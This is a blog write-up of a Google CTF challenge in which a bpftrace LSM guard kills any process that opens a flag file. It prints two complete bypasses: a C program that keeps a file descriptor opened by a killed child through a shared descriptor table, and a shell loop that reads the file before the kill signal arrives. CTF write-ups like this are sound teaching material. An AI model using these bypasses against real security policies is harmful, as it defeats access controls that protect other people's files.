eBPF, Race Conditions and Soham Parekh

29 Jun, 2025

I This is a somewhat random write-up for a recent (also my very first) CTF hosted by Google. In the days following the CTF, the 2025 Soham Parekh fiasco emerged, and I couldn't help but notice a few parallels between the two events. The nature of the exploit remained the same.

First, some context:

A Capture The Flag (CTF) is an event with several problems which have a hidden string of format "CTF{some-fun-message}" that you need to find. The more strings you find, the higher you rank.
Soham Parekh Fiasco: it's a rabbit hole, but the tl;dr is that this guy managed to land multiple jobs at respectable(?) tech companies and eventually got caught:
PSA: there’s a guy named Soham Parekh (in India) who works at 3-4 startups at the same time. He has been preying on YC companies and more. Beware.

I fired this guy in his first week and told him to stop lying / scamming people. He hasn’t stopped a year later. No more excuses.
— Suhail (@Suhail) July 2, 2025

I'll connect the dots at the end if I have the time.

What is a BPF?

BPF Berkeley Packet Filter -> (eBPF). Originally meant for TCP packet filtering. eBPF was extended to implement Linux security modules

What is an LSM?

The Linux Security Module (LSM) is a framework that enables the implementation of different security policies through kernel-level access controls in Linux systems. With recent kernel versions, small LSM policies can now be implemented using eBPF programs attached to LSM hooks.

The challenge: MISC-BPFBOX

The challenge description is just this:

I heard people can write LSMs using BPF, so I built one.

As a complete beginner to CTFs, this made me give up already. However, I decided to lock-in and dive-deep. When you download the attachment for the challenge and unzip it, you get this:

❯ tree .
.
├── Dockerfile
├── flag.txt
├── flake.lock
├── flake.nix
├── ham.sh
├── init
│   ├── go.mod
│   └── main.go
└── run_qemu

Ok? There is no README.md or any other documentation, so you gotta go through the codebase and figure out what is happening. Without going into too many details, the three important hints are in these files:

flag.txt

CTF{this isn't a flag}

This is literally the location of the flag.

run_qemu

#!/usr/bin/env bash
exec qemu-system-x86_64 -serial mon:stdio -nographic -cpu host -m 1024 -accel kvm -kernel /bzImage -initrd /initrd.gz -append "console=ttyS0 quiet"

We are dropped inside some sort of VM.

init/main.go

# init/main.go line 15:33
const probeText = `
BEGIN {
 printf("ready\n")
}

fentry:vmlinux:security_create_user_ns {
 signal(KILL);
}
 
fentry:vmlinux:security_file_open {
 $inode = args->file->f_inode;
 $d = $inode->i_sb->s_dev;
 $i = $inode->i_ino;

 if ($d == $1 && $i == $2) {
  signal(KILL);
 }
}
`

There is a "guard process," i.e. the eBPF LSM running as root that is monitoring the VM. The guard will kill any attempts at: a) opening the flags.txt file descriptor and b) increasing your privilege level

So, to summarize the challenge, it is just this:

You are dropped inside a VM
Your goal is to read the flag.txt file
You are the least privileged user in this VM with uid 99999 and gid 99999. Think of it as a clear, out-of-the-way identifier that guarantees zero built-in privileges. Root is uid and gid 0.
Any attempts to open the flag.txt or create a new user-namespace are killed by the "guard-process".

Next, I want to inspect the environment to get a feel for what works and what does not. The next section will only cover how to bring up a testing environment and can be completely skipped.

III

First, to get inside the virtual machine hosted by Google, you have to run this:

nc bpfbox.2025.ctfcompetition.com 1337

This command asks you to provide proof of work to actually enter a VM:

== proof-of-work: enabled ==
please solve a pow first
You can run the solver with:
    python3 <(curl -sSL https://goo.gle/kctf-pow) solve <some_key>
===================

Solution?

This lets you inside the VM. However, there is a catch: You only have 60 seconds to do anything inside the VM. You then get kicked out.

    /bin/sh: can't access tty; job control turned off
~ $ command failed: signal: killed
[   61.347266] reboot: Power down

real    1m2.069s
user    0m0.051s
sys     0m0.065s

Thankfully, the zip we downloaded comes with a Dockerfile that we can use to build our own custom VM and get rid of that timeout. More on that in the next section, but even building the VM was tricky.

I use a Macbook Air with an Apple M2 chip, but the run_qemu calls the qemu-system-x86_64 binary with a -accel kvm flag. This kernel module is not supported on my MacBook. So, I just booted up a c6a.large instance with an Ubuntu OS and found out the hard way that this would ALSO NOT let me use the /dev/kvm kernel module. It is a virtual instance that runs on a slice of an AMD Milan host under the Nitro hypervisor, which deliberately hides VT-x/AMD-V, so the kernel refuses to load KVM, and /dev/kvm never shows up. So I had to use a c6a.metal to create the VM to be able to use hardware acceleration. /dev/kvm is the device that user-space tools such as QEMU or Firecracker talk to when they want hardware-accelerated virtualisation. On any cloud-provider you get those extensions only on “metal” instances—for example, c6a.metal.

Here is a simple mental model generated using an LLM:

                 c6a.large  (virtual instance)
                 ────────────────────────────
      ┌───────────────┐
      │ Guest kernel  │        Linux / Windows
      └───────┬───────┘
              │  /dev/kvm = ✗   ← AMD-V not exposed
      ┌───────┴───────┐
      │ QEMU -enable  │        falls back to **TCG**
      │      (TCG)    │
      └───────┬───────┘
              │  VM-exit
      ┌───────┴───────┐
      │ Nitro HV      │        traps everything, shares host
      └───────┬───────┘
              │
      ┌───────┴───────┐
      │ EPYC Milan    │        real silicon
      └───────────────┘



                 c6a.metal  (bare-metal)
                 ───────────────────────
      ┌───────────────┐
      │ Guest kernel  │        you own the box
      └───────┬───────┘
              │  /dev/kvm = ✔
      ┌───────┴───────┐
      │ QEMU -enable  │        runs with **KVM**
      │      (KVM)    │
      └───────┬───────┘
              │  VM-exit (direct)
      ┌───────┴───────┐
      │ EPYC Milan    │        no hypervisor layer
      └───────────────┘

tl;dr use a .metal and not a virtual instance:

Instance type: c6a.metal
OS: ubuntu/images/hvm-ssd-gp3/ubuntu-noble-24.04-amd64-server-20250610

What is "KVM"?

A Linux kernel module that exposes CPU virtualization extensions (Intel VT-x, AMD-V, etc.) to user-space.

What is the difference between a metal and virtual instance?

Virtual = Guest ➜ Nitro ➜ CPU (Partly virtualized access to Perf counters / SR-IOV / MSRs)

Metal = Guest ➜ CPU (Full native access to Perf counters / SR-IOV / MSRs)

To set up the instance, build the VM image and enter it, do the following:

sudo su
apt-get update
apt-get install -y docker.io qemu-system unzip
wget https://storage.googleapis.com/2025-attachments/bf17a3af285b9346a35fddd9b3208f2eb20fefa5bcacb9a6dc896de4ed26b032b35dd286540c22272eda14cc8863cc727c2ad422dbd8bf61520a94e403e1a2ee.zip

unzip bf17a3af285b9346a35fddd9b3208f2eb20fefa5bcacb9a6dc896de4ed26b032b35dd286540c22272eda14cc8863cc727c2ad422dbd8bf61520a94e403e1a2ee.zip
cd bf17a3af285b9346a35fddd9b3208f2eb20fefa5bcacb9a6dc896de4ed26b032b35dd286540c22272eda14cc8863cc727c2ad422dbd8bf61520a94e403e1a2ee.zip
cd misc-bpfbox/
chmod +x run_qemu
docker build -t bpfbox .
docker run --rm -it --privileged bpfbox /run_qemu

We'll start probing our VM environment and see what we can do. First, let's give ourselves a bit more time to see what all inside the VM. Temporarily, I apply this patch to increase the timeout to 60 minutes:

diff --git a/init/main.go b/init/main.go
index 38e7720..47999ee 100644
--- a/init/main.go
+++ b/init/main.go
@@ -121,7 +121,7 @@ func shutdown() error {
 }
 
 func spawnShell(ctx context.Context) error {
-       withTimeout, cancel := context.WithTimeout(ctx, time.Minute)
+       withTimeout, cancel := context.WithTimeout(ctx, time.Hour)
        defer cancel()
 
        cmd := exec.CommandContext(withTimeout, "/bin/sh")

Ok, now here is what the VM has:

/bin/sh: can't access tty; job control turned off
~ $ ls
bin       flag.txt  nix       root      tmp
dev       init      proc      sys       var
~ $ id
uid=99999 gid=99999
~ $ ps
PID   USER     TIME  COMMAND
    1 0         0:00 /init
    2 0         0:00 [kthreadd]
    3 0         0:00 [pool_workqueue_]
    4 0         0:00 [kworker/R-kvfre]
    5 0         0:00 [kworker/R-rcu_g]
    6 0         0:00 [kworker/R-sync_]
    7 0         0:00 [kworker/R-slub_]
    8 0         0:00 [kworker/R-netns]
    9 0         0:00 [kworker/0:0-pm]
   10 0         0:00 [kworker/0:1-eve]
   11 0         0:00 [kworker/0:0H-ev]
   12 0         0:00 [kworker/u4:0-ev]
   13 0         0:00 [kworker/u4:1-ev]
   14 0         0:00 [kworker/R-mm_pe]
   15 0         0:00 [rcu_tasks_kthre]
   16 0         0:00 [rcu_tasks_rude_]
   17 0         0:00 [rcu_tasks_trace]
   18 0         0:00 [ksoftirqd/0]
   19 0         0:00 [rcu_preempt]
   20 0         0:00 [rcu_exp_par_gp_]
   21 0         0:00 [rcu_exp_gp_kthr]
   22 0         0:00 [migration/0]
   23 0         0:00 [idle_inject/0]
   24 0         0:00 [cpuhp/0]
   25 0         0:00 [kdevtmpfs]
   26 0         0:00 [kworker/R-inet_]
   27 0         0:00 [kauditd]
   28 0         0:00 [khungtaskd]
   29 0         0:00 [oom_reaper]
   30 0         0:00 [kworker/u4:2-ev]
   31 0         0:00 [kworker/R-write]
   32 0         0:00 [kcompactd0]
   33 0         0:00 [ksmd]
   34 0         0:00 [khugepaged]
   35 0         0:00 [kworker/R-kinte]
   36 0         0:00 [kworker/R-kbloc]
   37 0         0:00 [kworker/R-blkcg]
   38 0         0:00 [irq/9-acpi]
   39 0         0:00 [kworker/R-devfr]
   40 0         0:00 [kworker/0:1H]
   41 0         0:00 [kswapd0]
   42 0         0:00 [kworker/R-kthro]
   43 0         0:00 [kworker/R-mld]
   44 0         0:00 [kworker/R-ipv6_]
   46 0         0:00 [kworker/u4:3-ev]
   52 0         0:00 [kworker/R-kstrp]
   53 0         0:00 [kworker/u5:0]
   57 0         0:00 /bin/bpftrace --unsafe -e  BEGIN {  printf("ready\n") }  f
   64 0         0:00 [kworker/0:2]
   65 99999     0:00 /bin/sh
   69 99999     0:00 ps

As expected, the shell is USER 99999, and any attempts at cat on flag.txt just does not work.

There are two exploits that can work on this challenge. The first exploit is more of a misdirection and not feasible, but the second exploit is the real solution. I'll explain both next.

After researching some previous eBPF related CTF write-ups, a common exploit emerged around "borrowing File-Descriptors (FD)". The exploit is roughly this:

The parent shares the FD table, lets the child open the flag, then kills it.
Parent survives with the now-forbidden descriptor.
Hunt for that descriptor and dump the flag.txt

I honestly do not know much C/C++, so I vibe-coded this exploit:

#define _GNU_SOURCE
#include <sched.h>
#include <signal.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

static void die(const char *m) { perror(m); exit(1); }

static int child_fn(void *arg)
{
    int fd = open("/flag.txt", O_RDONLY); // BPF program will kill this task
    (void)fd; // parent will inherit the descriptor 
    pause(); here      */
    return 0;
}

int main (void)
{
    /* 1. create a pipe just to occupy FDs 3 and 4, so the flag likely ends up
          at FD 5 — not strictly required, just makes the scan deterministic */
    int pipefd[2];
    if (pipe(pipefd)) die("pipe");

    /* 2. clone a child that *shares* our file-descriptor table */
    const int stack_sz = 64 * 1024;
    char *stack = malloc(stack_sz);
    if (!stack) die("malloc");

    pid_t pid = clone(child_fn, stack + stack_sz,
                      CLONE_FILES | SIGCHLD, NULL);
    if (pid < 0) die("clone");

    /* 3. wait until the child is dead (SIGKILL from the LSM) */
    waitpid(pid, NULL, 0);

    /* 4. scan FDs 5..255, read first 256-byte chunk that looks printable      */
    char buf[256];
    for (int fd = 5; fd < 256; fd++) {
        ssize_t n = pread(fd, buf, sizeof buf - 1, 0);
        if (n <= 0) continue;
        /* crude check: must start with "CTF{" (change if organisers use other
           prefix) and be printable ASCII                              */
        if (n >= 4 && !memcmp(buf, "CTF{", 4)) {
            buf[n] = '\0';
            write(STDOUT_FILENO, buf, n);
            write(STDOUT_FILENO, "\n", 1);
            return 0;
        }
    }

    fprintf(stderr, "[-] flag FD not found — kernel behaviour differs?\n");
    return 1;
}

I baked this exploit into the local VM, and it worked on the first try. This also made me ridiculously bullish on LLMs and vibe-coding, cuz a complete noob, like me, now has the ability to develop complex exploits just by talking to an LLM. This also pushed my $P (d o o m)$ to ~99%.

Anyway, I spent an embarrassing amount of time trying to figure out a way to get this binary inside the actual CTF VM. I was convinced that this was the perfect exploit, and I would get the flag as soon as I'm able to execute this binary on the VM. I tried several things like downloading the binary on the VM, copy pasting the base64 of the binary inside the VM, and decoding it again, etc. However, nothing worked, so I had to go back to the drawing board. This takes us to the second exploit:

After an ungodly amount of time spent talking to LLMs, I started to develop another exploit. This time, with a deeper understanding of what a kernel is doing. LSM provides a "hook" mechanism that BPF programs can use to implement a security gate/feature. In this case, we have two "hooks": one is if someone tries to "open" an fd, and one is if someone creates a user-namespace. The BPF program would detect these attempts and kill any process attempting the above two.

We saw above that, inside the VM, there is basically just one BPF program that is running.

Now, everytime someone tries to open the flag.txt file, the BPF program tries to detect this attempt and sends a SIGKILL. However, if several processes are trying to open a file, all of them get issued a SIGKILL by the BPF program. And, if we spawn multiple process that attempt to open the file, then if we can read them before the SIGKILL is delivered, then we get to see the flag. The SIGKILL can be delivered late because signal delivery is async, and kernel scheduling + execution can get impacted due to opening multiple processes.

Finally, the exploit is just this:

for i in 1 2 3 4 5; do
    (
        timeout 1 head -c 256 /flag.txt 2>/dev/null | grep "CTF{" 2>/dev/null
    ) &
done
wait

You can directly paste this inside the VM and boom you get the flag.

CTF{En0ugH_r4c3_c0nd1tIoNs_T0_H05t_O1yMp1c5}

VII

The above exploit suddenly made me aware of the time that exists "between" the issue of a SIGKILL and the death of a process. Computers are super fast, so it is tempting to think that this is an instantaneous shift in the process with no gaps in between but these gaps exist. A malicious program does not need to live forever to finish the exploit. To draw parallels between this CTF and Soham Parekh; the way I see it is:

LSM policy = The employment contract that Soham signed with each company i.e. terminate Soham's employment if he is working for multiple start ups at the same time.
ePBF program = HR/Background check/Anonymous tip that would have revealed that Soham is "Moonlighting".
SIGKILL issued = Suhail's tweet bringing attention this Soham's hack, before his contract is terminated by every one of his employers.

The point of this post is to get back into the habit of documenting my technical deep-dives and new info that I've been getting etc.

#bpf #ctf #exploit #linux #llm #lsm #meta #parekh #soham #soham parekh #yc